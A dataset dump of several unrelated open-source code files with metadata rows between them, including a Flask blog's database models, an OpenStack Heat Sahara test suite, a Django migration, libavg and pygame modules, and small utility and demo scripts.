super(User, self).__init__(**kwargs)
if self.role is None:
if self.email == current_app.config['ADMINMAIL']:
self.role = Role.query.filter_by(permissions=0xff).first()
if self.role is None:
self.role = Role.query.filter_by(default=True).first()
# 检查用户是否有指定权限
def operation(self, permissions):
return self.role is not None and \
(self.role.permissions & permissions) == permissions
def is_administrator(self):
return self.operation(Permission.ADMINISTER)
# 关注
def follow(self, user):
if not self.is_following(user):
follower = Follow(follower=self, followed=user)
db.session.add(follower)
# 取消关注
def unfollow(self, user):
follower =self.followed.filter_by(followed_id=user.id).first()
if follower:
db.session.delete(follower)
# 做了一个followed关系查询,这个查询返回所有当前用户作为关注者的(follower, followed)对
def is_following(self, user):
return self.followed.filter_by(followed_id=user.id).first() is not None
def is_followed_by(self, user):
return self.followers.filter_by(follower_id=user.id).first() is not None
# 获取关注者文章
@property
def followed_posts(self):
return Post.query.join(Follow, Follow.followed_id==Post.author_id).filter(
Follow.follower_id==self.id)
# python内置装饰器,把一个方法变为属性调用
@property
def password(self):
raise AttributeError('password is not a readable attribute')
@password.setter
def password(self, password):
self.password_hash = generate_password_hash(password)
def verify_password(self, password):
return check_password_hash(self.password_hash, password)
# Gravatar提供用户头像
def gravatar(self, size):
return 'http://www.gravatar.com/avatar/' + md5(self.email.encode('utf-8')).hexdigest() + '?d=mm&s=' + str(size)
# 支持基于令牌的认证
def generate_auth_token(self, expiration):
s = Serializer(current_app.config['ECRET_KEY'],expires_in=expiration)
return s.dumps({'id': self.id})
@staticmethod
def verify_auth_token(token):
s = Serializer(current_app.config['SECRET_KEY'])
try:
data = s.loads(token)
except:
return None
return User.query.get(data['id'])
# 把用户转换成JSON格式的序列化字典
# 提供给客户端的内容无需和数据库模型内部完全一致
def to_json(self):
json_user = {
'url': url_for('api.get_user', id=self.id, _external=True),
'nickname': self.nickname,
'last_seen': self.last_seen,
'posts': url_for('api.get_user_posts', id=self.id, _external=True),
'followed_posts': url_for('api.get_user_followed_posts', id=self.id, _external=True),
'post_count': self.posts.count()
}
return json_user
def __repr__(self):
return '<User %r>' % (self.nickname)
@lm.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
class Role(db.Model):
__tablename__ = 'roles'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), unique=True)
default = db.Column(db.Boolean, default=False, index=True)
permissions = db.Column(db.Integer)
users = db.relationship('User', backref = 'role', lazy='dynamic')
@staticmethod
def insert_roles():
roles = {
'User': (Permission.FOLLOW |
Permission.COMMENT |
Permission.WRITE_ARTICLES, True),
'Moderator': (Permission.FOLLOW |
Permission.COMMENT |
Permission.WRITE_ARTICLES |
Permission.MODERATE_COMMENTS, False),
'Administrator': (0xff, False)
}
for r in roles:
role = Role.query.filter_by(name=r).first()
if role is None:
role = Role(name=r)
role.permissions = roles[r][0]
role.default = roles[r][1]
db.session.add(role)
db.session.commit()
def __repr__(self):
return '<Role %r>' % (self.name)
class Permission:
FOLLOW = 0x01
COMMENT = 0x02
WRITE_ARTICLES = 0x04
MODERATE_COMMENTS = 0x08
ADMINISTER = 0x80
@whooshee.register_model('title','body')
class Post(db.Model):
__tablename__ = 'posts'
# __searchable__ = ['body']
id = db.Column(db.Integer, primary_key = True)
title = db.Column(db.String(64))
body = db.Column(db.Text)
disabled = db.Column(db.Boolean)
view_num = db.Column(db.Integer, default=0)
body_html = db.Column(db.Text)
draft = db.Column(db.Boolean, default=False)
# outline = db.Column(db.String(250))
# like_num = db.Column(db.Integer, default=0)
timestamp = db.Column(db.DateTime, index=True, default=datetime.datetime.utcnow)
author_id = db.Column(db.Integer, db.ForeignKey('users.id'))
like_num = db.relationship('Like', backref='post', lazy='dynamic')
comments = db.relationship('Comment', backref='post', lazy='dynamic')
# reply_comments = db.relationship('Reply', backref='post', lazy='dynamic')
@staticmethod
def preview_body(target, value, oldvalue, initiator):
allowed_tags = [
'a', 'abbr', 'acronym', 'b', 'img', 'blockquote', 'code',
'em', 'i', 'li', 'ol', 'pre', 'strong', 'ul', 'h1', 'h2',
'h3', 'p'
]
target.body_html = bleach.linkify(bleach.clean(
markdown(value, output_format='html'),
tags=allowed_tags, strip=True,
attributes={
'*': ['class'],
'a': ['href', 'rel'],
'img': ['src', 'alt'], # 支持标签和属性
}
))
# 把文章转换成JSON格式的序列化字典
def to_json(self):
json_post = {
'url': url_for('api.get_post', id=self.id, _external=True),
'title': self.title,
'body': self.body,
'body_html': self.body_html,
'timestamp': self.timestamp,
'author': url_for('api.get_user', id=self.author_id, _external=True),
'comments': url_for('api.get_post_comments', id=self.id, _external=True),
'comment_count': self.comments.count()
}
return json_post
@staticmethod
def from_json(json_post):
body = json_post.get('body')
title = json_post.get('title')
if body is None or body == '':
raise ValidationError('post does not have a body')
if title is None or title == '':
raise ValidationError('post does not have a title')
return Post(body=body,title=title)
def __repr__(self):
return '<Post %r>' % (self.body)
db.event.listen(Post.body, 'set', Post.preview_body)
# 检验用户权限对应的类
class AnonymousUser(AnonymousUserMixin):
def operation(self, permissions):
return False
def is_administrator(self):
return False
lm.anonymous_user = AnonymousUser
# 点赞
class Like(db.Model):
__tablename__ = 'likes'
id = db.Column(db.Integer, primary_key=True)
unread = db.Column(db.Boolean, default=True)
timestamp = db.Column(db.DateTime, index=True, default=datetime.datetime.utcnow())
liker_id = db.Column(db.Integer, db.ForeignKey('users.id'))
post_id = db.Column(db.Integer, db.ForeignKey('posts.id'))
class Comment(db.Model):
__tablename__ = 'comments'
id = db.Column(db.Integer, primary_key=True)
body = db.Column(db.Text)
body_html = db.Column(db.Text)
timestamp = db.Column(db.DateTime, index=True, default=datetime.datetime.utcnow())
disabled = db.Column(db.Boolean)
comment_type = db.Column(db.String(64), default='comment')
reply_to = db.Column(db.String(128), default='notReply')
unread = db.Column(db.Boolean)
author_id = db.Column(db.Integer, db.ForeignKey('users.id'))
post_id = db.Column(db.Integer, db.ForeignKey('posts.id'))
@staticmethod
def on_changed_body(target, value, oldvalue, initiator):
allowed_tags = [
'a', 'abbr', 'acronym', 'b', 'code', 'em', 'img', 'i', 'strong'
]
target.body_html = bleach.linkify(bleach.clean(
markdown(value, output_format='html'),
tags=allowed_tags, strip=True
))
db.event.listen(Comment.body, 'set', Comment.on_changed_body)
# 会话
class Conversation(db.Model):
__tablename__ = 'conversations'
id = db.Column(db.Integer, primary_key=True)
from_user_id = db.Column(db.Integer, db.ForeignKey('users.id'))
to_user_id = db.Column(db.Integer, db.ForeignKey('users.id'))
letter = db.Column(db.String(255))
timestamp = db.Column(db.DateTime, index=True, default=datetime.datetime.utcnow())
unread = db.Column(db.Boolean, default=True)
to_user = db.relationship('User', lazy='joined', foreign_keys=[to_user_id])
from_user = db.relationship('User', lazy='joined', foreign_keys=[from_user_id])
# 管理
class Admin(db.Model):
__tablename__ = 'admin'
id = db.Column(db.Integer, primary_key=True)
notice = db.Column(db.String(25))
timestamp = db.Column(db.DateTime, index=True, default=datetime.datetime.utcnow())
def __repr__(self):
return '<Admin %r>' % (self.notice)
| mit | 6,585,300,988,462,585,000 | 35.289973 | 119 | 0.631917 | false |
maestro-hybrid-cloud/heat | heat/tests/test_sahara_templates.py | 1 | 14859 | # Copyright (c) 2014 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
import six
from heat.common import exception
from heat.common import template_format
from heat.engine.clients.os import neutron
from heat.engine.clients.os import nova
from heat.engine.clients.os import sahara
from heat.engine.resources.openstack.sahara import sahara_templates as st
from heat.engine import scheduler
from heat.tests import common
from heat.tests import utils
node_group_template = """
heat_template_version: 2013-05-23
description: Sahara Node Group Template
resources:
node-group:
type: OS::Sahara::NodeGroupTemplate
properties:
name: node-group-template
plugin_name: vanilla
hadoop_version: 2.3.0
flavor: m1.large
volume_type: lvm
floating_ip_pool: some_pool_name
node_processes:
- namenode
- jobtracker
is_proxy_gateway: True
"""
cluster_template = """
heat_template_version: 2013-05-23
description: Sahara Cluster Template
resources:
cluster-template:
type: OS::Sahara::ClusterTemplate
properties:
name: test-cluster-template
plugin_name: vanilla
hadoop_version: 2.3.0
neutron_management_network: some_network
"""
cluster_template_without_name = """
heat_template_version: 2013-05-23
resources:
cluster_template!:
type: OS::Sahara::ClusterTemplate
properties:
plugin_name: vanilla
hadoop_version: 2.3.0
neutron_management_network: some_network
"""
node_group_template_without_name = """
heat_template_version: 2013-05-23
resources:
node_group!:
type: OS::Sahara::NodeGroupTemplate
properties:
plugin_name: vanilla
hadoop_version: 2.3.0
flavor: m1.large
floating_ip_pool: some_pool_name
node_processes:
- namenode
- jobtracker
"""
class FakeNodeGroupTemplate(object):
def __init__(self):
self.id = "some_ng_id"
self.name = "test-cluster-template"
self.to_dict = lambda: {"ng-template": "info"}
class FakeClusterTemplate(object):
def __init__(self):
self.id = "some_ct_id"
self.name = "node-group-template"
self.to_dict = lambda: {"cluster-template": "info"}
class SaharaNodeGroupTemplateTest(common.HeatTestCase):
def setUp(self):
super(SaharaNodeGroupTemplateTest, self).setUp()
self.stub_FlavorConstraint_validate()
self.stub_SaharaPluginConstraint()
self.stub_VolumeTypeConstraint_validate()
self.patchobject(nova.NovaClientPlugin, 'get_flavor_id'
).return_value = 'someflavorid'
self.patchobject(neutron.NeutronClientPlugin, '_create')
self.patchobject(neutron.NeutronClientPlugin, 'find_neutron_resource'
).return_value = 'some_pool_id'
sahara_mock = mock.MagicMock()
self.ngt_mgr = sahara_mock.node_group_templates
self.plugin_mgr = sahara_mock.plugins
self.patchobject(sahara.SaharaClientPlugin,
'_create').return_value = sahara_mock
self.patchobject(sahara.SaharaClientPlugin, 'validate_hadoop_version'
).return_value = None
self.fake_ngt = FakeNodeGroupTemplate()
self.t = template_format.parse(node_group_template)
def _init_ngt(self, template):
self.stack = utils.parse_stack(template)
return self.stack['node-group']
def test_ngt_resource_mapping(self):
ngt = self._init_ngt(self.t)
mapping = st.resource_mapping()
self.assertEqual(st.SaharaNodeGroupTemplate,
mapping['OS::Sahara::NodeGroupTemplate'])
self.assertIsInstance(ngt,
st.SaharaNodeGroupTemplate)
def _create_ngt(self, template):
ngt = self._init_ngt(template)
self.ngt_mgr.create.return_value = self.fake_ngt
scheduler.TaskRunner(ngt.create)()
self.assertEqual((ngt.CREATE, ngt.COMPLETE), ngt.state)
self.assertEqual(self.fake_ngt.id, ngt.resource_id)
return ngt
def test_ngt_create(self):
self._create_ngt(self.t)
args = {
'name': 'node-group-template',
'plugin_name': 'vanilla',
'hadoop_version': '2.3.0',
'flavor_id': 'someflavorid',
'description': "",
'volumes_per_node': None,
'volumes_size': None,
'volume_type': 'lvm',
'security_groups': None,
'auto_security_group': None,
'availability_zone': None,
'volumes_availability_zone': None,
'node_processes': ['namenode', 'jobtracker'],
'floating_ip_pool': 'some_pool_id',
'node_configs': None,
'image_id': None,
'is_proxy_gateway': True,
'volume_local_to_instance': None,
'use_autoconfig': None
}
self.ngt_mgr.create.assert_called_once_with(**args)
def test_validate_floatingippool_on_neutron_fails(self):
ngt = self._init_ngt(self.t)
self.patchobject(ngt, 'is_using_neutron').return_value = True
self.patchobject(
neutron.NeutronClientPlugin, 'find_neutron_resource'
).side_effect = [
neutron.exceptions.NeutronClientNoUniqueMatch(message='Too many'),
neutron.exceptions.NeutronClientException(message='Not found',
status_code=404)
]
ex = self.assertRaises(exception.StackValidationFailed, ngt.validate)
self.assertEqual('Too many',
six.text_type(ex))
ex = self.assertRaises(exception.StackValidationFailed, ngt.validate)
self.assertEqual('Not found',
six.text_type(ex))
def test_validate_floatingippool_on_novanetwork_fails(self):
ngt = self._init_ngt(self.t)
self.patchobject(ngt, 'is_using_neutron').return_value = False
nova_mock = mock.MagicMock()
nova_mock.floating_ip_pools.find.side_effect = (
nova.exceptions.NotFound(404, message='Not found'))
self.patchobject(nova.NovaClientPlugin,
'_create').return_value = nova_mock
ex = self.assertRaises(exception.StackValidationFailed, ngt.validate)
self.assertEqual('Not found', six.text_type(ex))
def test_validate_flavor_constraint_return_false(self):
self.t['resources']['node-group']['properties'].pop('floating_ip_pool')
self.t['resources']['node-group']['properties'].pop('volume_type')
ngt = self._init_ngt(self.t)
self.patchobject(nova.FlavorConstraint, 'validate'
).return_value = False
self.patchobject(ngt, 'is_using_neutron').return_value = False
ex = self.assertRaises(exception.StackValidationFailed, ngt.validate)
self.assertEqual(u"Property error: "
u"resources.node-group.properties.flavor: "
u"Error validating value 'm1.large'",
six.text_type(ex))
def test_template_invalid_name(self):
tmpl = template_format.parse(node_group_template_without_name)
stack = utils.parse_stack(tmpl)
ngt = stack['node_group!']
self.ngt_mgr.create.return_value = self.fake_ngt
scheduler.TaskRunner(ngt.create)()
self.assertEqual((ngt.CREATE, ngt.COMPLETE), ngt.state)
self.assertEqual(self.fake_ngt.id, ngt.resource_id)
name = self.ngt_mgr.create.call_args[1]['name']
self.assertIn('-nodegroup-', name)
def test_ngt_show_resource(self):
ngt = self._create_ngt(self.t)
self.ngt_mgr.get.return_value = self.fake_ngt
self.assertEqual({"ng-template": "info"}, ngt.FnGetAtt('show'))
self.ngt_mgr.get.assert_called_once_with('some_ng_id')
def test_validate_node_processes_fails(self):
ngt = self._init_ngt(self.t)
plugin_mock = mock.MagicMock()
plugin_mock.node_processes = {
"HDFS": ["namenode", "datanode", "secondarynamenode"],
"JobFlow": ["oozie"]
}
self.plugin_mgr.get_version_details.return_value = plugin_mock
ex = self.assertRaises(exception.StackValidationFailed, ngt.validate)
self.assertIn("resources.node-group.properties: Plugin vanilla "
"doesn't support the following node processes: "
"jobtracker. Allowed processes are: ",
six.text_type(ex))
self.assertIn("namenode", six.text_type(ex))
self.assertIn("datanode", six.text_type(ex))
self.assertIn("secondarynamenode", six.text_type(ex))
self.assertIn("oozie", six.text_type(ex))
def test_update(self):
ngt = self._create_ngt(self.t)
rsrc_defn = self.stack.t.resource_definitions(self.stack)['node-group']
rsrc_defn['Properties']['node_processes'] = [
'tasktracker', 'datanode']
scheduler.TaskRunner(ngt.update, rsrc_defn)()
args = {
'name': 'node-group-template',
'plugin_name': 'vanilla',
'hadoop_version': '2.3.0',
'flavor_id': 'someflavorid',
'description': "",
'volumes_per_node': None,
'volumes_size': None,
'volume_type': 'lvm',
'security_groups': None,
'auto_security_group': None,
'availability_zone': None,
'volumes_availability_zone': None,
'node_processes': ['tasktracker', 'datanode'],
'floating_ip_pool': 'some_pool_id',
'node_configs': None,
'image_id': None,
'is_proxy_gateway': True,
'volume_local_to_instance': None,
'use_autoconfig': None
}
self.ngt_mgr.update.assert_called_once_with('some_ng_id', **args)
self.assertEqual((ngt.UPDATE, ngt.COMPLETE), ngt.state)
class SaharaClusterTemplateTest(common.HeatTestCase):
def setUp(self):
super(SaharaClusterTemplateTest, self).setUp()
self.patchobject(st.constraints.CustomConstraint, '_is_valid'
).return_value = True
self.patchobject(neutron.NeutronClientPlugin, '_create')
self.patchobject(neutron.NeutronClientPlugin, 'find_neutron_resource'
).return_value = 'some_network_id'
sahara_mock = mock.MagicMock()
self.ct_mgr = sahara_mock.cluster_templates
self.patchobject(sahara.SaharaClientPlugin,
'_create').return_value = sahara_mock
self.patchobject(sahara.SaharaClientPlugin, 'validate_hadoop_version'
).return_value = None
self.fake_ct = FakeClusterTemplate()
self.t = template_format.parse(cluster_template)
def _init_ct(self, template):
self.stack = utils.parse_stack(template)
return self.stack['cluster-template']
def test_ct_resource_mapping(self):
ct = self._init_ct(self.t)
mapping = st.resource_mapping()
self.assertEqual(st.SaharaClusterTemplate,
mapping['OS::Sahara::ClusterTemplate'])
self.assertIsInstance(ct,
st.SaharaClusterTemplate)
def _create_ct(self, template):
ct = self._init_ct(template)
self.ct_mgr.create.return_value = self.fake_ct
scheduler.TaskRunner(ct.create)()
self.assertEqual((ct.CREATE, ct.COMPLETE), ct.state)
self.assertEqual(self.fake_ct.id, ct.resource_id)
return ct
def test_ct_create(self):
self._create_ct(self.t)
args = {
'name': 'test-cluster-template',
'plugin_name': 'vanilla',
'hadoop_version': '2.3.0',
'description': '',
'default_image_id': None,
'net_id': 'some_network_id',
'anti_affinity': None,
'node_groups': None,
'cluster_configs': None,
'use_autoconfig': None
}
self.ct_mgr.create.assert_called_once_with(**args)
def test_ct_validate_no_network_on_neutron_fails(self):
self.t['resources']['cluster-template']['properties'].pop(
'neutron_management_network')
ct = self._init_ct(self.t)
self.patchobject(ct, 'is_using_neutron', return_value=True)
ex = self.assertRaises(exception.StackValidationFailed,
ct.validate)
self.assertEqual("neutron_management_network must be provided",
six.text_type(ex))
def test_template_invalid_name(self):
tmpl = template_format.parse(cluster_template_without_name)
stack = utils.parse_stack(tmpl)
ct = stack['cluster_template!']
self.ct_mgr.create.return_value = self.fake_ct
scheduler.TaskRunner(ct.create)()
self.assertEqual((ct.CREATE, ct.COMPLETE), ct.state)
self.assertEqual(self.fake_ct.id, ct.resource_id)
name = self.ct_mgr.create.call_args[1]['name']
self.assertIn('-clustertemplate-', name)
def test_ct_show_resource(self):
ct = self._create_ct(self.t)
self.ct_mgr.get.return_value = self.fake_ct
self.assertEqual({"cluster-template": "info"}, ct.FnGetAtt('show'))
self.ct_mgr.get.assert_called_once_with('some_ct_id')
def test_update(self):
ct = self._create_ct(self.t)
rsrc_defn = self.stack.t.resource_definitions(self.stack)[
'cluster-template']
rsrc_defn['Properties']['plugin_name'] = 'hdp'
rsrc_defn['Properties']['hadoop_version'] = '1.3.2'
scheduler.TaskRunner(ct.update, rsrc_defn)()
args = {
'name': 'test-cluster-template',
'plugin_name': 'hdp',
'hadoop_version': '1.3.2',
'description': '',
'default_image_id': None,
'net_id': 'some_network_id',
'anti_affinity': None,
'node_groups': None,
'cluster_configs': None,
'use_autoconfig': None
}
self.ct_mgr.update.assert_called_once_with('some_ct_id', **args)
self.assertEqual((ct.UPDATE, ct.COMPLETE), ct.state)
| apache-2.0 | -4,499,161,583,605,528,000 | 38.205805 | 79 | 0.605761 | false |
dumel93/project- | type_page/migrations/0002_auto_20170711_1101.py | 1 | 1481 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-07-11 11:01
from __future__ import unicode_literals
import django.contrib.auth.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('type_page', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='FootballType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_team', models.CharField(max_length=64, null=True)),
('second_team', models.CharField(max_length=64, null=True)),
('draw', models.BooleanField(default=True)),
('date_game', models.DateTimeField()),
('league', models.CharField(max_length=64)),
('course', models.IntegerField()),
('bet', models.IntegerField()),
],
options={
'ordering': ['date_game'],
},
),
migrations.AlterField(
model_name='user',
name='username',
field=models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, unique=True, validators=[django.contrib.auth.validators.ASCIIUsernameValidator()], verbose_name='username'),
),
]
| mit | -2,548,361,275,656,014,000 | 39.027027 | 315 | 0.576637 | false |
lynxis/libavg | src/python/avgapp.py | 1 | 4330 | # libavg - Media Playback Engine.
# Copyright (C) 2003-2011 Ulrich von Zadow
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Current versions can be found at www.libavg.de
#
# Original author of this file is Martin Heistermann <mh at sponc dot de>
#
from appstarter import AppStarter
class AVGApp(object):
_instances = {}
multitouch = False
fakeFullscreen = False
def __init__(self, parentNode):
'''
Initialization before Player.play()
Use this only when needed, e.g. for
WordsNode.addFontDir(). Do not forget to call
super(YourApp, self).__init__(parentNode)
'''
import warnings
warnings.warn('AVGApp is deprecated, use libavg.app.App instead')
appname = self.__class__.__name__
if appname in AVGApp._instances:
raise RuntimeError('App %s already setup' % appname)
AVGApp._instances[appname] = self
self.__isRunning = False
self._parentNode = parentNode
self._starter = None
if 'onKey' in dir(self):
raise DeprecationWarning, \
'AVGApp.onKey() has been renamed to AVGApp.onKeyDown().'
@classmethod
def get(cls):
'''
Get the Application instance
Note: this class method has to be called from the top-level app class:
>>> class MyApp(libavg.AVGApp):
... pass
>>> instance = MyApp.get()
'''
return cls._instances.get(cls.__name__, None)
@classmethod
def start(cls, **kwargs):
if cls.multitouch:
from appstarter import AVGMTAppStarter
starter = AVGMTAppStarter
else:
from appstarter import AVGAppStarter
starter = AVGAppStarter
starter(appClass=cls, fakeFullscreen=cls.fakeFullscreen, **kwargs)
def init(self):
"""main initialization
build node hierarchy under self.__parentNode."""
pass
def exit(self):
"""Deinitialization
Called after player.play() returns. End of program run."""
pass
def _enter(self):
"""enter the application, internal interface.
override this and start all animations, intervals
etc. here"""
pass
def _leave(self):
"""leave the application, internal interface.
override this and stop all animations, intervals
etc. Take care your application does not use any
non-needed resources after this."""
pass
def enter(self, onLeave = lambda: None):
"""enter the application, external interface.
Do not override this."""
self.__isRunning = True
self._onLeave = onLeave
self._enter()
def leave(self):
"""leave the application, external interface.
Do not override this."""
self.__isRunning = False
self._onLeave()
self._leave()
def onKeyDown(self, event):
"""returns bool indicating if the event was handled
by the application """
return False
def onKeyUp(self, event):
"""returns bool indicating if the event was handled
by the application """
return False
def isRunning(self):
return self.__isRunning
def setStarter(self, starter):
self._starter = starter
def getStarter(self):
return self._starter
class App(object):
@classmethod
def start(cls, *args, **kargs):
raise RuntimeError('avgapp.App cannot be used any longer. Use libavg.AVGApp for '
'a compatible class or switch to the new libavg.app.App')
| lgpl-2.1 | -1,709,239,406,444,618,200 | 29.492958 | 89 | 0.627483 | false |
plamut/ggrc-core | test/selenium/src/lib/utils/string_utils.py | 1 | 1860 | # Copyright (C) 2017 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Utility functions for string operations."""
import random
import string
import uuid
BLANK = ''
COMMA = ',' # comma is used as delimiter for multi-choice values
LESS = '<' # need exclude this character due to issue GGRC-527
DOUBLE_QUOTES = '"' # need exclude this character due to issue GGRC-931
BACKSLASH = '\\' # need exclude this character due to issue GGRC-931
EXCLUDE = COMMA + LESS + DOUBLE_QUOTES + BACKSLASH
SPECIAL = BLANK.join(_ for _ in string.punctuation if _ not in EXCLUDE)
def random_string(size=5, chars=string.letters + string.digits + SPECIAL):
"""Return string with corresponding size that filled by values from selected
chars.
"""
return BLANK.join(random.choice(chars) for position in range(size))
def random_uuid(length=13):
"""Return string with predefined length base on UUID."""
return str(uuid.uuid4())[:length]
def random_list_strings(list_len=3, item_size=5,
chars=string.letters + string.digits + SPECIAL):
"""Return list of random strings separated by comma."""
return COMMA.join(random_string(item_size, chars) for i in range(list_len))
def get_bool_from_string(str_to_bool):
"""Return True for 'Yes' and False for 'No'."""
if str_to_bool.title() == 'Yes':
return True
elif str_to_bool.title() == 'No':
return False
else:
raise ValueError("'{}' can't be converted to boolean".format(str_to_bool))
def remap_keys_for_list_dicts(dict_transformation_keys, list_dicts):
"""Remap keys names for old list of dictionaries according
transformation dictionary {OLD KEY: NEW KEY} and return new updated
list of dictionaries.
"""
return [{dict_transformation_keys[key]: value for key, value
in dic.iteritems()} for dic in list_dicts]
| apache-2.0 | -5,070,785,767,555,766,000 | 34.769231 | 78 | 0.703763 | false |
tommy-u/enable | examples/enable/component_demo.py | 1 | 1333 | """
Basic demo of drawing within an Enable component.
"""
from enable.api import Component, ComponentEditor
from traits.api import HasTraits, Instance
from traitsui.api import Item, View
class MyComponent(Component):
def draw(self, gc, **kwargs):
w,h = gc.width(), gc.height()
gc.clear()
# Draw a rounded rect just inside the bounds
gc.set_line_width(2.0)
gc.set_stroke_color((0.0, 0.0, 0.0, 1.0))
r = 15
b = 3
gc.move_to(b, h/2)
gc.arc_to(b, h-b,
w/2, h-b,
r)
gc.arc_to(w-b, h-b,
w-b, h/2,
r)
gc.arc_to(w-b, b,
w/2, b,
r)
gc.arc_to(b, b,
b, h/2,
r)
gc.line_to(b, h/2)
gc.stroke_path()
return
def normal_key_pressed(self, event):
print "key pressed: ", event.character
class Demo(HasTraits):
canvas = Instance(Component)
traits_view = View(Item('canvas', editor=ComponentEditor(),
show_label=False, width=200, height=200),
resizable=True, title="Component Example")
def _canvas_default(self):
return MyComponent()
if __name__ == "__main__":
Demo().configure_traits()
| bsd-3-clause | 8,483,525,954,035,567,000 | 24.150943 | 69 | 0.501875 | false |
lcoandrade/DsgTools | tests/test_OtherAlgorithms.py | 1 | 2763 | # -*- coding: utf-8 -*-
"""
/***************************************************************************
DsgTools
A QGIS plugin
Brazilian Army Cartographic Production Tools
-------------------
begin : 2019-07-04
git sha : $Format:%H$
copyright : (C) 2019 by João P. Esperidião - Cartographic Engineer @ Brazilian Army
email : [email protected]
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
"""
Script designed to test each validation algorithm from DSGTools 4.X.
It is supposed to be run through QGIS with DSGTools installed.
* This is merely a prototype for our unit test suite. *
"""
import os
import sys
import warnings
import yaml
import shutil
from osgeo import ogr
import processing
from qgis.utils import iface
from qgis.core import QgsDataSourceUri, QgsVectorLayer, QgsProcessingFeedback,\
QgsProcessingContext, QgsLayerTreeLayer, QgsProject
from qgis.PyQt.QtSql import QSqlDatabase
from DsgTools.core.dsgEnums import DsgEnums
from DsgTools.core.Factories.DbFactory.dbFactory import DbFactory
from DsgTools.core.Factories.LayerLoaderFactory.layerLoaderFactory import LayerLoaderFactory
from qgis.testing import unittest
from DsgTools.tests.algorithmsTestBase import AlgorithmsTest, GenericAlgorithmsTest
class Tester(GenericAlgorithmsTest, AlgorithmsTest):
@classmethod
def setUpClass(cls):
cls.cleanup_paths = []
@classmethod
def tearDownClass(cls):
QgsProject.instance().clear()
for path in cls.cleanup_paths:
shutil.rmtree(path)
def get_definition_file(self):
return 'otherAlgorithms.yaml'
def run_all(filterString=None):
"""Default function that is called by the runner if nothing else is specified"""
filterString = 'test_' if filterString is None else filterString
suite = unittest.TestSuite()
suite.addTests(unittest.makeSuite(Tester, filterString))
unittest.TextTestRunner(verbosity=3, stream=sys.stdout).run(suite)
| gpl-2.0 | 1,559,963,913,760,249,000 | 38.442857 | 102 | 0.56791 | false |
yjpark/lnkr | lnkr/app_config.py | 1 | 1375 | import os
import lnkr
import term
from toml_config import TomlConfig
from import_section import ImportSection, new_import_section
class AppConfig(TomlConfig):
def __init__(self, path):
if not hasattr(self, 'kind'):
self.kind = "App"
self.attribs = {}
self.import_sections = []
TomlConfig.__init__(self, path)
def parse(self):
term.verbose('\nParse %s Config: %s' % (self.kind, term.format_path(self.path)))
for key in self.values:
value = self.values[key]
if isinstance(value, dict):
import_section = new_import_section(self.root_path, key, value)
if import_section is not None:
self.import_sections.append(import_section)
else:
self.attribs[key] = value
for key in self.attribs:
term.verbose('Parse %s Config Attrib: %s = %s' % (self.kind, term.format_path(key), term.format_param(self.attribs[key])))
for section in self.import_sections:
term.verbose('Parse %s Config Import Section: %s' % (self.kind, term.format_param(section.__str__())))
return len(self.import_sections) > 0
def get_import_section(self, key):
for section in self.import_sections:
if section.key == key:
return section
return None
| mit | 8,578,927,095,839,543,000 | 36.162162 | 134 | 0.592 | false |
CTPUG/pygame_cffi | pygame/constants.py | 1 | 3624 | # pygame_cffi - a cffi implementation of the pygame library
# Copyright (C) 2013 Neil Muller
# Copyright (C) 2013 Jeremy Thurgood
# Copyright (C) 2013 Maciej Fijalkowski
# Copyright (C) 2014 Rizmari Versfeld
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Library General Public
# License along with this library; if not, write to the Free
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301 USA
""" pygame constants """
from pygame._sdl import sdl
# Event types
NOEVENT = sdl.SDL_NOEVENT
ACTIVEEVENT = sdl.SDL_ACTIVEEVENT
KEYDOWN = sdl.SDL_KEYDOWN
KEYUP = sdl.SDL_KEYUP
MOUSEMOTION = sdl.SDL_MOUSEMOTION
MOUSEBUTTONDOWN = sdl.SDL_MOUSEBUTTONDOWN
MOUSEBUTTONUP = sdl.SDL_MOUSEBUTTONUP
JOYAXISMOTION = sdl.SDL_JOYAXISMOTION
JOYBALLMOTION = sdl.SDL_JOYBALLMOTION
JOYHATMOTION = sdl.SDL_JOYHATMOTION
JOYBUTTONDOWN = sdl.SDL_JOYBUTTONDOWN
JOYBUTTONUP = sdl.SDL_JOYBUTTONUP
QUIT = sdl.SDL_QUIT
SYSWMEVENT = sdl.SDL_SYSWMEVENT
EVENT_RESERVEDA = sdl.SDL_EVENT_RESERVEDA
EVENT_RESERVEDB = sdl.SDL_EVENT_RESERVEDB
